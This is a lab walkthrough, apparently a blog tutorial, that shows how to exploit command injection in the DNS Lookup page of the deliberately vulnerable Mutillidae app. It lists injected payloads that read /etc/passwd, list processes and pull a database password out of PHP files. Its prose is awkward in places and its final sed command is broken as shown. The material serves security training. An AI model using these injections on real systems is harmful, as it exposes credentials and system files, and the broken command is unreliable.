Web Penetration Testing
Mutillidae Part 2: Command Injection Database Interrogation
What is Mutillidae?
Mutillidae is a free, open source, Vulnerable Web-application provide a target for Web-Security analyst. It have OWASP-Top10 Vulnerability, and designed by OWASP.
What is command Injection?
Command Injection is a web-vulnerability that allow attacker to run Operating System commands or Server side scripts from the web interface (Web application). Such type of vulnerability occurs when web application allow users to access any command for example nslookup, whois, ping, traceroute etc through webpage. This vulnerability can tested by fuzzing technique. In fuzzing attacker commonly used a word like “;” or “|” or “||” or “&” or “&&” end of expected input.
For example [expected_Input]; [command]
Pre-Requisite Web Penetration Testing Lab
1. Configured Mutillidae.
How To Setup Virtual Lab For Web Penetration Testing
Remote database access has been turned on.
2. Installed Kali Linux:
In Simple way Kali Linux is not necessary, but if you are penetration Tester you should use Kali Linux Virtual Machine.
Configure the network interface of both machine Fedora-Mutillidae and Kali Linux. Start both machine and check the connectivity between them.
How to install Kali Linux
Step 1: Access Mutillidae by Kali Linux Machine
Go to DNS Lookup
OWASP Top 10 à A2 – Cross Site Scripting (XSS) à Reflected (First Order) à DNS Lookup
DNS Lookup is designed to do just that by a dnslookup utility in command interface
Hostname /IP: www.cyberpedia.in
Click on the Lookup DNS button and see your Results.
Test DNS Lookup Vulnerability
To find the command execution vulnerability, just enter the hostname and then command separated by “;”. The procedure “;” after what the software expects, is called fuzzing. Enter following code
www.cyberpedia.in; uname –a
View you Results
It would be wonder if you get that particular web application is running from. In Linux you would be able to find current working directory by “pwd”. Follow the given instructions:
Enter: Hostname / IP: www.cyberpedia.in; pwd
Click on the Lookup DNS Button, and view you Results.
Interrogate the dns-lookup.php application
The codes are filled by attacker is excuted by dns-lookup.php. Let’s see if we are able to find the line code where PHP is exciting a system call. Follow instructions
hostname; find /var/www/html/mutillidae -name “dns-lookup.php” | xargs egrep ‘(exec|system|virtual)’
Click on Lookup DNS button, Analyze you Results
“nslookup” Linux command is executing by a function called shell_exec(),
Enter the following syntax
- hostname; cat /etc/passwd | egrep -i ‘(postgres|sql|db2|ora)’
- By using “ps” command you can discover the Database Engine. It is used to search for the process strings such as pstgresql, sql, db2 and ora.
hostname; ps -eaf | egrep -i ‘(postgres|sql|db2|ora)’
In this step we will figure out if any php scripts contain a database name and password under /var/www/html/mutillidae. Fill the given syntax into the text box and click on the Lookup DNS button
hostname; find /var/www/html/mutillidae -name “*.php”
Find the password in php scripts:
Obtain Password from the Results:
See the string password, it is in actual
$mMySQLDatabasePassword = “toor”;
Search for user OR Login in the MySQLHandler.php
As We know the Database passwords are inside the MySQLHandler.php. following code is used for obtain the user or Login
hostname; find /var/www/html/mutillidae -name “MySQLHandler.php” | xargs egrep -i ‘(user|login)’ | grep “=”
I figure I could have demonstrated to you this to start with, however great things go to those that hold up.
It is possible to show the substance of the MySQLHandler.php program, by encoding the “<?php” and “?>” labels. These tags advise apache to execute a php script. To get around this issue and simply show the content of the project, we change “<” to “<” and “>” to “>”.
hostname; find /var/www/html/mutillidae -name “MySQLHandler.php” | xargs cat | sed ‘s/</\</g’ | sed ‘s/>/\>/g’